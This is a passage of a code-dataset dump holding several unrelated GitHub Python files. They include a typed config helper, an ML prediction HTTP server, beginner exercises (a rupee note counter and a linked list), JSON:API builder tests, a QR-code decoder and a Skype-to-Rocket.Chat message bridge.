@functools.wraps(cast)\n def maybe(s: t.Optional[str]) -> t.Optional[SomeType]:\n return cast(s) if s else None\n return maybe\n\n\ncast_bool = decouple.Config(None)._cast_boolean\n\ndefault_casts = {\n int: int,\n float: float,\n complex: complex,\n bool: cast_bool,\n str: str,\n bytes: str.encode,\n\n t.List[int]: decouple.Csv(int),\n t.List[float]: decouple.Csv(float),\n t.List[complex]: decouple.Csv(complex),\n t.List[bool]: decouple.Csv(cast_bool),\n t.List[str]: decouple.Csv(str),\n t.List[bytes]: decouple.Csv(str.encode),\n\n t.Optional[int]: optional(int),\n t.Optional[float]: optional(float),\n t.Optional[complex]: optional(complex),\n t.Optional[bool]: optional(cast_bool),\n t.Optional[str]: optional(str),\n t.Optional[bytes]: optional(str.encode),\n\n t.Optional[t.List[int]]: optional(decouple.Csv(int)),\n t.Optional[t.List[float]]: optional(decouple.Csv(float)),\n t.Optional[t.List[complex]]: optional(decouple.Csv(complex)),\n t.Optional[t.List[bool]]: optional(decouple.Csv(cast_bool)),\n t.Optional[t.List[str]]: optional(decouple.Csv(str)),\n t.Optional[t.List[bytes]]: optional(decouple.Csv(str.encode)),\n}\n\n\ndef is_optional(type_: t.Type) -> bool:\n \"\"\"Return True if the given type is t.Optional[SomeType]\"\"\"\n try:\n orig, args = type_.__origin__, type_.__args__\n except AttributeError:\n return False\n return ((orig == t.Union) and (len(args) == 2) and (type(None) in args))\n\n\nclass TypedConfig(object):\n \"\"\"\n Build a configuration object out of the annotations of the subclass.\n \"\"\"\n\n def __init__(self, casts: t.Optional[t.Mapping[SomeType, CastType]] = None, ignored_names: t.Container[str] = ()) -> None:\n \"\"\"\n Supply or replace the attributes of the subclass with the configured values\n according to their type annotations and defaults.\n \"\"\"\n casts = {**default_casts, **(casts or {})}\n for name, type_ in self.__annotations__.items():\n if name.startswith('_') or name in ignored_names:\n continue\n cfg = functools.partial(decouple.config, name, cast=casts[type_])\n if hasattr(self, name): # Subclass has a default value\n attribute = getattr(self, name)\n setattr(self, name, cfg(default=attribute))\n elif is_optional(type_): # default=None\n setattr(self, name, cfg(default=None))\n else:\n setattr(self, name, cfg())\n","repo_name":"kojiromike/typed-config","sub_path":"typed_config.py","file_name":"typed_config.py","file_ext":"py","file_size_in_byte":6129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1379987061","text":"\ntry:\n import SocketServer as socketserver\n from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler\nexcept ImportError:\n import socketserver\n from http.server import HTTPServer, BaseHTTPRequestHandler\nfrom MLMain import MlMain\nfrom os import listdir\nfrom os.path import isfile, join\n\nversion = 'NOVER'\n\nclass S(BaseHTTPRequestHandler):\n\tglobalMlMain = MlMain()\n\n\tdef setup(self):\n\t\tBaseHTTPRequestHandler.setup(self)\n\t\tself.request.settimeout(0.2)\n\n\tdef _set_headers(self):\n\t\tself.send_response(200)\n\t\tself.send_header('Content-type', 'text/html')\n\t\tself.end_headers()\n\n\tdef do_GET(self):\n\t\tself.wfile.write(\"Get Request\".encode('utf-8'))\n\n\tdef do_HEAD(self):\n\t\tself._set_headers()\n\n\tdef do_POST(self):\n\t\t'''\n\t\tHandle POST requests.\n\t\t'''\n\t\t#print('The Request: %s' % (self.path))\n\t\t#requestStr = urllib2.unquote((self.path));\n\t\t#requestStr = unquote(self.path)\n\n\t\tpred = self.globalMlMain.mlMain(version,self.path, 'COMBINED_LSTM10_DENSE36_DENSE24')\n\t\t\n\t \t# the response\n\t\tself.wfile.write(pred.encode('utf-8'))\n\n\n\ndef run(server_class=HTTPServer, handler_class=S, port=9998):\n\tserver_address = ('', port)\n\thttpd = server_class(server_address, handler_class)\n\tprint('Starting MLServer...')\n\tprint('Listening on port ' + str(port))\n\thttpd.serve_forever()\n\n\n\nif __name__ == \"__main__\":\n\tfrom sys import argv\n\t\n\tif len(argv) == 3:\n\t\tversion = str(argv[2])\n\t\trun(port=int(argv[1]))\n\telif len(argv) == 2:\n\t\tversion = \"V1\"\n\t\trun(port=int(argv[1]))\n\telse:\n\t\tprint('not enough argv')","repo_name":"josephkamel/F2MD","sub_path":"machine-learning-server/MLServer.py","file_name":"MLServer.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"40"} +{"seq_id":"71250051322","text":"#wap to enter an amount in rupees(integer) and print number of 1000,500,100,50,20,10,5 and 1 rupees \n# notes that will be equivalent to the amount entered\n\namount = int(input(\"enter the amount in rupees: \")) \nprint(\"the amount is: \", amount)\n# for_thousand = 0\n# for_fivehundred = 0\n# for_hundred = 0\n# for_fifty = 0\n# for_twenty = 0\n# for_ten = 0\n# for_five = 0\n# for_one = 0\n# new_amount = 0\n\n#e.g - 1995\n\n\n\ndef check_thousand(amount):\n for_thousand = 0\n for_thousand = amount // 1000\n amount = amount - (for_thousand * 1000)\n print(\"it has \" + str(for_thousand) + \" thousand\")\n if amount >= 500 and amount < 1000:\n check_fivehundred(amount)\n elif amount >= 100 and amount < 500:\n check_hundred(amount)\n elif amount >= 50 and amount < 100:\n check_fifty(amount)\n elif amount >= 20 and amount < 50:\n check_twenty(amount)\n elif amount >=10 and amount < 20:\n check_ten(amount)\n elif amount >=5 and amount < 10:\n check_five(amount)\n elif amount >=1 and amount < 5:\n check_one(amount)\n elif amount == 1000:\n for_thousand = 1\n\n\ndef check_fivehundred(amount):\n for_fivehundred = 0\n for_fivehundred = amount // 500\n amount = amount - (for_fivehundred * 500)\n print(\"it has \" + str(for_fivehundred) + \" five-hundred\")\n if amount >= 100 and amount < 500:\n check_hundred(amount)\n elif amount >= 50 and amount < 100:\n check_fifty(amount)\n elif amount >= 20 and amount < 50:\n check_twenty(amount)\n elif amount >=10 and amount < 20:\n check_ten(amount)\n elif amount >=5 and amount < 10:\n check_five(amount)\n elif amount >=1 and amount < 5:\n check_one(amount)\n elif amount == 500:\n for_fivehundred = 1\n\ndef check_hundred(amount):\n for_hundred = 0\n for_hundred = amount // 100\n amount = amount - (for_hundred * 100)\n print(\"it has \" + str(for_hundred) + \" hundred\")\n if amount >= 50 and amount < 100:\n check_fifty(amount)\n elif amount >= 20 and amount < 50:\n check_twenty(amount)\n elif amount >=10 and amount < 20:\n check_ten(amount)\n elif amount >=5 and amount < 10:\n check_five(amount)\n elif amount >=1 and amount < 5:\n check_one(amount)\n \n elif amount == 100:\n for_hundred = 1\n\n\ndef check_fifty(amount):\n for_fifty = 0\n for_fifty = amount // 50\n amount = amount - (for_fifty * 50)\n print(\"it has \" + str(for_fifty) + \" fifty\")\n if amount >= 20 and amount < 50:\n check_twenty(amount)\n elif amount >=10 and amount < 20:\n check_ten(amount)\n elif amount >=5 and amount < 10:\n check_five(amount)\n elif amount >=1 and amount < 5:\n check_one(amount)\n \n elif amount == 50:\n for_fifty = 1\n\ndef check_twenty(amount):\n for_twenty = 0\n for_twenty = amount // 20\n amount = amount - (for_twenty * 20)\n print(\"it has \" + str(for_twenty) + \" twenty\")\n if amount >= 10 and amount < 20:\n check_ten(amount)\n elif amount < 10 and amount >= 5:\n check_five(amount)\n elif amount >=1 and amount < 5:\n check_one(amount)\n elif amount == 20:\n for_twenty = 1 \n\ndef check_ten(amount):\n for_ten = 0\n for_ten = amount // 10\n amount = amount - (for_ten * 10)\n print(\"it has \" + str(for_ten) + \" ten\")\n if amount >= 5 and amount < 10:\n check_five(amount)\n elif amount < 5 and amount >= 1:\n check_one(amount)\n elif amount == 10:\n for_ten = 1\n\ndef check_five(amount):\n for_five = 0\n for_five = amount // 5\n amount = amount - (for_five * 5)\n print(\"it has \" + str(for_five) + \" five\")\n if amount >= 1 and amount < 5:\n check_one(amount)\n elif amount == 5:\n for_five = 1\n\ndef check_one(amount):\n for_one = 0\n for_one = amount // 1\n amount = amount - (for_one * 1)\n print(\"it has \" + str(for_one) + \" one\")\n if amount == 1:\n for_one = 1\n\nvar = check_thousand(amount)\n\n# print(\"it breaks down to \" + str(for_thousand) + \" thousand and \" + str(for_fivehundred) + \" five hundred and \" + str(for_hundred) + \" hundred and \" + str(for_fifty) + \" fifty and \" + str(for_twenty) + \" twenty and \" + str(for_ten) + \" ten and \" + str(for_five) + \" five and \" +str(for_one) + \" one\")\n\n \n\n\n\n\n\n# if amount > 1000 :\n# for_thousand = amount // 1000 #1\n# amount = amount - (for_thousand * 1000) #995\n# if amount < 1000:\n# if amount > 500:\n# for_fivehundred = amount // 500 #1\n# amount = amount - (for_fivehundred * 500) #495\n# elif amount == 500:\n# for_fivehundred = 1\n# if amount < 500:\n# if amount > 100 and amount < 500:\n# for_hundred = amount // 100 #4\n# amount = amount - (for_hundred * 100) #95\n# elif amount == 100:\n# for_hundred = 1\n# if amount < 100:\n# if amount > 50 and amount < 100:\n# for_fifty = amount // 50 #1\n# amount = amount - (for_fifty * 50) #45\n# elif amount == 50:\n# for_fifty = 1\n# if amount < 50:\n# if amount > 20 and amount < 50:\n# for_twenty = amount // 20 #2\n# amount = amount - (for_twenty * 20) #5\n# elif amount == 20:\n# for_twenty = 1\n# if amount < 20:\n# if amount > 10 and amount < 20:\n# for_ten = amount // 10 \n# amount = amount - (for_ten * 10)\n \n# elif amount == 10:\n# for_ten = 1\n# if amount < 10:\n# if amount > 5 and amount < 10:\n# for_five = amount // 5\n# amount = amount - (for_five * 5)\n\n# elif amount == 5:\n# for_five = 1\n# if amount < 5:\n# if amount > 1 and amount < 5:\n# for_one = amount // 1\n# amount = amount - (for_one * 1)\n# elif amount == 1:\n# for_one = 1\n\n \n\n\n\n \n'''elif amount == 1000:\n for_thousand = 1\n\nelif amount < 1000:\n print(\"in the second loop\")\n if amount > 500:\n for_fivehundred = amount // 500 #1\n amount = amount - (for_fivehundred * 500) #495\n elif amount == 500:\n for_fivehundred = 1\n\n elif amount > 100 and amount < 500:\n for_hundred = amount // 100 #4\n amount = amount - (for_hundred * 100) #95\n \n elif amount == 100:\n for_hundred = 1\n\n elif amount > 50 and amount < 100:\n for_fifty = amount // 50 #1\n amount = amount - (for_fifty * 50) #45\n\n elif amount == 50:\n for_fifty = 1\n elif amount > 20 and amount < 50:\n for_twenty = amount // 20 #2\n amount = amount - (for_twenty * 20) #5\n elif amount == 20:\n for_twenty = 1\n\n elif amount > 10 and amount < 20:\n for_ten = amount // 10 \n amount = amount - (for_ten * 10)\n \n elif amount == 10:\n for_ten = 1\n\n elif amount > 5 and amount < 10:\n for_five = amount // 5\n amount = amount - (for_five * 5)\n\n elif amount == 5:\n for_five = 1\n\n elif amount > 1 and amount < 5:\n for_one = amount // 1\n amount = amount - (for_one * 1)\n elif amount == 1:\n for_one = 1\n \n '''\n\n\n\n\n\n\n\n ","repo_name":"asishraz/banka_sir_notes","sub_path":"ch_1/41.py","file_name":"41.py","file_ext":"py","file_size_in_byte":8087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4475975401","text":"import pytest\nfrom typing import Optional\nfrom datetime import date\nfrom typing import ForwardRef\nfrom src import JsonApiResource, resource_id, attribute, relationship\nfrom src.json_api_call_context import JsonApiCallContext\nfrom src.json_api_resource_builder import build_resource\n\n\nclass BaseResource(JsonApiResource):\n @staticmethod\n def base_url() -> str:\n return \"http://some.url\"\n\n\ndef test_builds_resource_with_id():\n class Resource(BaseResource):\n id: str = resource_id()\n\n result = build_resource(JsonApiCallContext(data={\"id\": \"42\"}), Resource())\n\n assert result.id == \"42\"\n\n\ndef test_builds_resource_with_attributes():\n class Resource(BaseResource):\n id: str = resource_id()\n attribute1: str = attribute()\n\n result = build_resource(\n JsonApiCallContext(data={\"id\": \"42\", \"attributes\": {\"attribute1\": \"value\"}}),\n Resource(),\n )\n\n assert result.attribute1 == \"value\"\n\n\ndef test_builds_resource_with_decoded_attributes():\n class Resource(BaseResource):\n id: str = resource_id()\n attribute1: date = attribute(decoder=date.fromisoformat)\n\n result = build_resource(\n JsonApiCallContext(data={\"id\": \"42\", \"attributes\": {\"attribute1\": \"2019-07-04\"}}),\n Resource(),\n )\n\n assert result.attribute1 == date(2019, 7, 4)\n\n\ndef test_builds_resource_raises_type_error():\n class Resource(BaseResource):\n id: str = resource_id()\n attribute1: str = attribute()\n\n with pytest.raises(TypeError, match=r\".* attribute1 .*\"):\n build_resource(\n JsonApiCallContext(data={\"id\": \"42\", \"attributes\": {\"attribute1\": 1}}),\n Resource(),\n )\n\n\ndef test_builds_resource_with_relationship_not_in_included():\n class Relationship(BaseResource):\n id: str = resource_id()\n attribute1: str = attribute()\n\n class Resource(BaseResource):\n id: str = resource_id()\n relationship1: Relationship = relationship()\n\n result = build_resource(\n JsonApiCallContext(\n data={\n \"id\": \"100\",\n \"relationships\": {\n \"relationship1\": {\"data\": {\"id\": \"42\", \"type\": \"relationships\"}}\n },\n }\n ),\n Resource(),\n )\n\n assert result.relationship1.id == \"42\"\n\n\ndef test_build_resource_with_relationship():\n class Relationship(BaseResource):\n id: str = resource_id()\n attribute1: str = attribute()\n\n class Resource(BaseResource):\n id: str = resource_id()\n relationship1: Relationship = relationship()\n\n result = build_resource(\n JsonApiCallContext(\n data={\n \"id\": \"100\",\n \"relationships\": {\n \"relationship1\": {\"data\": {\"id\": \"42\", \"type\": \"relationships\"}}\n },\n },\n included=[\n {\n \"id\": \"42\",\n \"type\": \"relationships\",\n \"attributes\": {\"attribute1\": \"value\"},\n }\n ],\n ),\n Resource(),\n )\n\n assert result.relationship1.id == \"42\"\n assert result.relationship1.attribute1 == \"value\"\n\n\ndef test_build_resource_with_optional_relationship():\n class Relationship(BaseResource):\n id: str = resource_id()\n\n class Resource(BaseResource):\n id: str = resource_id()\n relationship1: Optional[Relationship] = relationship()\n\n result = build_resource(\n JsonApiCallContext(\n data={\"id\": \"100\", \"relationships\": {\"relationship1\": {\"data\": None}}}\n ),\n Resource(),\n )\n\n assert result.relationship1 is None\n\n\ndef test_build_resource_with_non_optional_relationship_raise_error():\n class Relationship(BaseResource):\n id: str = resource_id()\n\n class Resource(BaseResource):\n id: str = resource_id()\n relationship1: Relationship = relationship()\n\n with pytest.raises(ValueError, match=r\".* relationship1 .*\"):\n build_resource(\n JsonApiCallContext(\n data={\"id\": \"100\", \"relationships\": {\"relationship1\": {\"data\": None}}}\n ),\n Resource(),\n )\n\n\ndef test_build_resource_raises_if_relationship_is_not_optional():\n class Relationship(BaseResource):\n id: str = resource_id()\n\n class Resource(BaseResource):\n id: str = resource_id()\n relationship1: Relationship = relationship()\n\n with pytest.raises(ValueError, match=r\".* relationship1 .*\"):\n build_resource(\n JsonApiCallContext(data={\"id\": \"100\", \"relationships\": {}}), Resource()\n )\n\ndef test_build_resource_with_cyclic_dependency():\n\n class Resource(BaseResource):\n id: str = resource_id()\n relationship1: ForwardRef(\"Relationship\") = relationship()\n\n class Relationshup(BaseResource):\n id: str = resource_id()\n\n result = build_resource(\n JsonApiCallContext(\n data={\n \"id\": \"100\",\n \"relationships\": {\n \"relationship1\": {\"data\": {\"id\": \"42\", \"type\": \"relationships\"}}\n },\n }\n ),\n Resource(),\n )\n\n assert result.relationship1.id == \"42\"\n\n","repo_name":"NilssonPL/json-api-smart","sub_path":"test/unit_test/test_json_api_resource_builder.py","file_name":"test_json_api_resource_builder.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"40"} +{"seq_id":"31815585810","text":"from pathlib import Path\nimport qrtools\nimport os\nimport numpy as np\nfrom PIL import Image\nfrom pyzbar.pyzbar import decode\n\nclass decoder:\n def __init__(self,shapekey,Folderpath):\n self.shapekey=shapekey\n self.Folderpath=Folderpath\n self.decode()\n\n def decode(self):\n \n one_d_array=[]\n paths = sorted(Path(self.Folderpath).iterdir(), key=os.path.getmtime)\n for i in range(len(paths)):\n filename=str(paths[i])\n if \"code\" in filename:\n file=filename\n result=decode(Image.open(file))\n \n for i in result:\n c=i.data.decode(\"utf-8\")\n d=len(c)\n cleaned_c=c[1:d-1]\n list=cleaned_c.split(\",\")\n for i in list:\n one_d_array.append(int(i))\n \n def extract_shapekey(c):\n d=c.split(\",\")\n e=d[0]\n f=d[1]\n g=e.split(\"(\")\n h=f.split(\")\")\n part_1=g[1]\n part_2=h[0]\n shapekey=(int(part_1),int(part_2))\n return shapekey \n\n shapekey=extract_shapekey(self.shapekey) \n cleaned_one_d_array=np.array(one_d_array)\n #reforming the array back to the original shape\n extracted_array=np.asarray(cleaned_one_d_array).reshape(shapekey)\n #convert back array to image and showing the image\n #extracted_array.astype(\"float64)\"\n extracted_image=Image.fromarray(np.uint8(extracted_array)).convert('RGB')\n extracted_image.show()\n extracted_image.save()\n\n\n\n \n","repo_name":"Surya2709/Steganography-With-QR-Codes","sub_path":"decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"40362541786","text":"class Node:\n\tdef __init__(self,data):\n\t\tself.data = data\n\t\tself.next = None\n\nclass LinkedList:\n\tdef __init__(self):\n\t\tself.head = None\n\t\t#self.count = None\n\n\tdef get_count(self):\n\t\thead = self.head\n\t\tcount = 0\n\t\twhile(head):\n\t\t\tcount += 1\n\t\t\thead = head.next\t\n\t\treturn count\n\n\tdef traversal(self):\n\t\tif self.head is None:\n\t\t\tprint('Empty!')\n\t\telse:\n\t\t\thead = self.head\n\t\t\twhile(head):\n\t\t\t\tprint(head.data)\n\t\t\t\thead = head.next\n\n\tdef insert_beginning(self,new_node):\n\t\tnew_node = Node(new_node)\n\t\tif self.head is None:\n\t\t\tprint('Empty')\n\t\telse:\n\t\t\tnew_node.next = self.head\n\t\t\tself.head = new_node\n\t\tself.traversal()\t\n\t\n\tdef insert_end(self,new_node):\n\t\tnew_node = Node(new_node)\n\t\thead = self.head\n\t\twhile (head.next):\n\t\t\thead = head.next\n\t\thead.next = new_node\n\t\tself.traversal()\n\t\n\tdef insert_at_pos(self,pos,new_node):\n\t\tnew_node = Node(new_node)\n\t\tself.length = self.get_count()\n\t\tprint('printing count value',self.length)\n\t\tif pos > self.length or pos < 0:\n\t\t\treturn None\n\t\telse:\n\t\t\tif pos == 0 :\n\t\t\t\tself.insert_beginning(new_node)\n\t\t\t\tprint('inserted at beg')\n\t\t\telse: \n\t\t\t\tif pos == self.length:\n\t\t\t\t\tself.insert_end(new_node)\n\t\t\t\t\tprint('inserted at end')\n\t\t\t\telse:\n\t\t\t\t\tprint('gonna inserted at pos')\n\t\t\t\t\tcurrent = self.head\n\t\t\t\t\tcount = 1\n\t\t\t\t\twhile count < pos-1 :\n\t\t\t\t\t\tcount += 1\n\t\t\t\t\t\tcurrent = current.next\n\t\t\t\t\tnew_node.next = current.next\n\t\t\t\t\tcurrent.next = new_node\n\t\t\t\t\tself.length += 1\t\t\t\n\t\tself.traversal()\t\n\n\tdef del_node(self,value):\n\t\tlength = self.get_count()\n\t\t# head = self.head\n\t\t# if length == 0:\n\t\t# \tprint('list is empty')\n\t\t# else:\n\t\t# \tif(head is not None):\n\t\t# \t\tif(head.data == value):\n\t\t# \t\t\tself.head = self.head.next\n\t\t# \t\t\tlength -= 1\n\t\t# \twhile(head is not None):\n\t\t# \t\tif (head.data == value):\n\t\t# \t\t\tbreak\n\t\t# \t\ttemp = head\n\t\t# \t\thead = temp.next\n\t\t# \ttemp.next = head.next\n\t\t# \thead = None\t \t\n\t\tif value == None:\n\t\t\treturn\n\t\telse:\n\t\t\twhile value.next is not None:\n\t\t\t\ttemp = value\n\t\t\t\tvalue.data = temp.next.data\n\t\t\t\t# value.next = temp.next.next\n\t\t\t\tvalue = value.next\t\n\t\t\ttemp.next = None\t\t\t\n\t\tself.traversal()\t\t\n\n\n\nlinklist = LinkedList()\nlinklist.head = Node(6)\nlink2 = Node(12)\nlink3 = Node(18)\nlink4 = Node(24)\nlink5 = Node(30)\nprint('printing link5',link5)\nlinklist.head.next = link2\nlink2.next = link3\nlink3.next = link4\nlink4.next = link5\n\n# linklist.traversal()\n# linklist.insert_end()\n# linklist.insert_beginning()\nlinklist.get_count()\n# linklist.insert_at_pos(3,14)\nlinklist.del_node(link2)","repo_name":"kskeerthana/DSA","sub_path":"LinkedLists/singlelinked.py","file_name":"singlelinked.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70858635321","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport requests\nimport json\nimport magic\nimport html\nimport markdown_strings as md\nimport pytz\nimport re\n\nfrom skpy import Skype\nfrom skpy import SkypeEventLoop\nfrom skpy import SkypeNewMessageEvent\nfrom skpy import SkypeEditMessageEvent\nfrom skpy import SkypeContacts\nfrom skpy import SkypeContactGroup\nfrom skpy import SkypeMessageEvent\nfrom skpy import SkypeConnection\n\nfrom bs4 import BeautifulSoup\n\nfrom datetime import datetime\n\napp_username = os.environ.get(\"SKYPE_USERNAME\")\nif not app_username:\n print(\"missing config SKYPE_USERNAME\")\n sys.exit(1)\n\napp_password = os.environ.get(\"SKYPE_PASSWORD\")\nif not app_password:\n print(\"missing config SKYPE_PASSWORD\")\n sys.exit(1)\n\nrocketchat_url = os.environ.get(\"ROCKETCHAT_URL\")\nif not rocketchat_url:\n print(\"missing config ROCKETCHAT_URL\")\n sys.exit(1)\n\nskype_bot_id = os.environ.get(\"SKYPE_BOT_ID\")\nif not skype_bot_id:\n print(\"missing config SKYPE_BOT_ID\")\n sys.exit(1)\n\nrocketchat_api = os.environ.get(\"ROCKETCHAT_API\")\nif not rocketchat_api:\n print(\"missing config ROCKETCHAT_API\")\n sys.exit(1)\n\nrocketchat_x_auth_token = os.environ.get(\"ROCKETCHAT_X_Auth_Token\")\nif not rocketchat_x_auth_token:\n print(\"missing config ROCKETCHAT_X_Auth_Token\")\n sys.exit(1)\n\nrocketchat_x_user_id = os.environ.get(\"ROCKETCHAT_X_User_Id\")\nif not rocketchat_x_user_id:\n print(\"missing config ROCKETCHAT_X_User_Id\")\n sys.exit(1)\n\nsk=Skype(app_username, app_password,\"/opt/skype-rocketchat-bridge/.tokens\")\nsk.chats\n\nprint(\"Skype to Rocket Chat Bridge Started\")\n\ndef process_msg(msg):\n\n msg = msg.replace(\"\",\"*\")\n msg = msg.replace(\"\",\"*\")\n\n msg = msg.replace(\"\",\"_\")\n msg = msg.replace(\"\",\"_\")\n\n msg = msg.replace(\"\",\"~\")\n msg = msg.replace(\"\",\"~\")\n\n msg = msg.replace(\"
    \",\"\")\n    msg = msg.replace(\"
    \",\"\")\n    msg = msg.replace(\"
    \",\"\")\n\n msg = re.sub('<(/)?ss( type=\"\\w+\")?>', '', msg)\n msg = msg.replace(\"\",\"\")\n\n msg = re.sub(']*>', '*@', msg)\n msg = msg.replace(\"\",\"*\")\n \n msg = re.sub(']+href=\\\"(.*?)\\\"[^>]*>', '', msg)\n msg = msg.replace(\"\",\"\")\n\n return msg\n\ndef process_quote_msg(msg,msg_id,msg_channel):\n soup = BeautifulSoup(msg, 'html.parser')\n q_msg = (soup.find('legacyquote').next_sibling)\n for msgs in sk.chats[msg_channel].getMsgs():\n if msgs.id == msg_id:\n q_msg = process_msg(msgs.content)\n return q_msg\n\n\nclass MySkype(SkypeEventLoop):\n def onEvent(self, event):\n if isinstance(event,(SkypeNewMessageEvent, SkypeEditMessageEvent, SkypeMessageEvent)):\n\n if os.path.exists('skype-bot.log'):\n logF = open(\"skype-bot.log\", \"a\", encoding=\"utf-8\")\n else:\n logF = open(\"skype-bot.log\", \"w\", encoding=\"utf-8\")\n\n log_prefix = event.msg.id\n \n try:\n logF.write(log_prefix + \": Start processing message.\" + '\\n')\n logF.write(log_prefix + \": Message ID : \" + event.msg.id + '\\n')\n logF.write(log_prefix + \": Message type : \" + event.msg.type + '\\n')\n except:\n pass\n\n if hasattr(sk.contacts.user(event.msg.userId),'name'):\n sender_name = str(getattr(sk.contacts.user(event.msg.userId), 'name'))\n logF.write(log_prefix + \": Sender Id found : \" + event.msg.userId + '\\n')\n logF.write(log_prefix + \": Sender name found : \" + sender_name + '\\n')\n else:\n sender_name = event.msg.userId\n\n if hasattr(sk.contacts.user(event.msg.userId),'avatar'):\n sender_avatar = sk.contacts.user(event.msg.userId).avatar\n if sender_avatar is not None:\n logF.write(log_prefix + \": Sender avatar found : \" + sender_avatar + '\\n')\n else:\n sender_avatar = \"https://vignette.wikia.nocookie.net/logopedia/images/f/fb/Skype_Logo_2019.svg/revision/latest/scale-to-width-down/340?cb=20191207211056\"\n\n if hasattr(sk.chats.chat(event.msg.chatId),'topic'):\n chattopic=sk.chats.chat(event.msg.chatId).topic\n logF.write(log_prefix + \": Chat Topic found : \" + chattopic + '\\n')\n else:\n chattopic=\"skype-bot-private-message\"\n\n message_content = event.msg.content\n logF.write(log_prefix + \": Message Content : \" + message_content + '\\n')\n processed_message = process_msg(message_content)\n\n data_set = {\n \"text\": processed_message,\n \"avatar\": sender_avatar,\n \"channel\": chattopic,\n \"from\":{\n \"id\":event.msg.userId,\n \"name\":sender_name\n },\n \"conversation\": {\n \"id\":event.msg.chatId\n }\n }\n \n try:\n print(event.msg)\n except:\n pass\n \n if (event.msg.type ==\"RichText/UriObject\" or event.msg.type ==\"RichText/Media_GenericFile\") and event.msg.userId != skype_bot_id:\n logF.write(log_prefix + \": Message File Name : \" + event.msg.file.name + '\\n')\n\n file_attach = open(event.msg.file.name,\"wb\")\n file_attach.write(event.msg.fileContent)\n file_attach.close()\n\n api_url = rocketchat_api+\"rooms.info?roomName=\"+chattopic\n X_Auth_Token=\"'X-Auth-Token': '\" + rocketchat_x_auth_token + \"'\"\n X_User_Id=\"'X-User-Id': '\" + rocketchat_x_user_id + \"'\"\n\n contentType=\"Content-Type:text/plain\"\n\n headers = {'X-Auth-Token' : rocketchat_x_auth_token , 'X-User-Id' : rocketchat_x_user_id }\n room_info = requests.get(api_url, headers = headers)\n\n parsed_json = (json.loads(room_info.text))\n room = parsed_json['room']\n room_id = room['_id']\n\n api_url = 'https://chat.majasolutions.net/api/v1/rooms.upload/'+room_id\n files = { 'file': (event.msg.file.name, open(event.msg.file.name, 'rb'),magic.from_file(event.msg.file.name, mime=True)),}\n bot_msg = {'msg' : 'File ' + magic.from_file(event.msg.file.name) + ' sent by ' + sender_name}\n upload_file = requests.post(api_url, data = bot_msg, headers = headers, files = files)\n logF.write(log_prefix + \": Upload File Status : \" + str(upload_file.status_code) + '\\n')\n if os.path.exists(event.msg.file.name):\n os.remove(event.msg.file.name)\n \n elif (event.msg.type ==\"RichText/Media_AudioMsg\") and event.msg.userId != skype_bot_id:\n audio_msg = BeautifulSoup(event.msg.content, 'html.parser')\n if len(audio_msg.find_all('uriobject')) > 0:\n attributes_dictionary = audio_msg.find('uriobject').attrs\n audio_file_url = attributes_dictionary['url_thumbnail']\n\n download_conn = SkypeConnection()\n download_conn.soapLogin(app_username,app_password)\n resp = download_conn(\"GET\", audio_file_url, auth=SkypeConnection.Auth.Authorize)\n\n if len(audio_msg.find_all('originalname')) > 0:\n attributes_dictionary = audio_msg.find('originalname').attrs\n audio_file_name = attributes_dictionary['v']\n open(audio_file_name,'wb').write(resp.content)\n \n logF.write(log_prefix + \": Message File Name : \" + audio_file_name + '\\n')\n\n api_url = rocketchat_api+\"rooms.info?roomName=\"+chattopic\n X_Auth_Token=\"'X-Auth-Token': '\" + rocketchat_x_auth_token + \"'\"\n X_User_Id=\"'X-User-Id': '\" + rocketchat_x_user_id + \"'\"\n\n contentType=\"Content-Type:text/plain\"\n \n headers = {'X-Auth-Token' : rocketchat_x_auth_token , 'X-User-Id' : rocketchat_x_user_id }\n room_info = requests.get(api_url, headers = headers)\n\n parsed_json = (json.loads(room_info.text))\n room = parsed_json['room']\n room_id = room['_id']\n\n api_url = 'https://chat.majasolutions.net/api/v1/rooms.upload/'+room_id\n files = { 'file': (audio_file_name, open(audio_file_name, 'rb'),magic.from_file(audio_file_name, mime=True)),} \n bot_msg = {'msg' : 'File ' + magic.from_file(audio_file_name) + ' sent by ' + sender_name + '\\n' +\n 'If the audio file is not complete, please hear it at the skype web or skype client.'\n }\n upload_file = requests.post(api_url, data = bot_msg, headers = headers, files = files)\n logF.write(log_prefix + \": Upload File Status : \" + str(upload_file.status_code) + '\\n')\n \n if os.path.exists(audio_file_name):\n os.remove(audio_file_name)\n\n else:\n SoupText = BeautifulSoup(processed_message, 'html.parser')\n if len(SoupText.find_all('quote')) > 0:\n attributes_dictionary = SoupText.find('quote').attrs\n tz = pytz.timezone('Asia/Kuala_Lumpur')\n ts = datetime.fromtimestamp(int(attributes_dictionary['timestamp']), tz)\n quote_orig_msg_id = attributes_dictionary['messageid']\n quote_author = attributes_dictionary['authorname']\n quote_msg_timestamp = ts.strftime('%Y-%m-%d %H:%M:%S %Z')\n quote_channel = event.msg.chatId\n\n new_msg = SoupText.find('quote').next_sibling\n quote_msg = process_quote_msg(processed_message,quote_orig_msg_id,quote_channel)\n\n data_set_attachment = {\n \"text\": new_msg,\n \"attachment\": {\n \"color\": '#0000DD',\n \"title\": quote_author + \" @ \" + quote_msg_timestamp,\n \"text\": quote_msg\n }\n }\n data_set.update(data_set_attachment)\n\n json_dump = json.dumps(data_set)\n logF.write(log_prefix + \": Message Sent : \" + json_dump + '\\n')\n\n if event.msg.userId != skype_bot_id:\n send_message = requests.post(rocketchat_url,data=json_dump)\n logF.write(log_prefix + \": Send Message Status : \" + str(send_message.status_code) + '\\n')\n\n logF.write(\"\\n\")\n\n logF.close()\n\nsk = MySkype(tokenFile=\"/opt/skype-rocketchat-bridge/.tokens\", 